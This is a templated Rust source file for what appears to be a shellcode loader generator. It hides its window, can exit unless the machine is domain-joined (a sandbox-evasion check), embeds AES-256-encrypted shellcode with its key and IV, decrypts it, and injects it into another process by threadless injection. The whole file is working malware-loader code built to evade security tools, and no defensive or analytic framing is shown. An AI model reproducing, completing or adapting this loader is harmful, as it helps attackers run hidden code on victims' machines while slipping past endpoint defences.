#![windows_subsystem = "windows"]
extern crate scaffold;

fn main() {
    unsafe {
        {%- if "SandboxDomain" in feature_names %}
        if !scaffold::sandbox::domain::is_domain_joined() { return; }
        {%- endif %}
        let {{ v.var_shellcode }}: &[u8] = &[
            {%- for byte in config.shellcode_hex | hex_bytes %}{{ byte }},{% endfor %}
        ];
        let {{ v.var_key }}: [u8; 32] = [
            {%- for byte in config.key_hex | hex_bytes %}{{ byte }},{% endfor %}
        ];
        let {{ v.var_iv }}: [u8; 16] = [
            {%- for byte in config.iv_hex | hex_bytes %}{{ byte }},{% endfor %}
        ];
        let {{ v.var_ptr }} = scaffold::crypto::decrypt_aes256(
            {{ v.var_shellcode }}, &{{ v.var_key }}, &{{ v.var_iv }}
        ).unwrap();
        scaffold::inject::threadless::inject_threadless(1234u32, &{{ v.var_ptr }});
    }
}
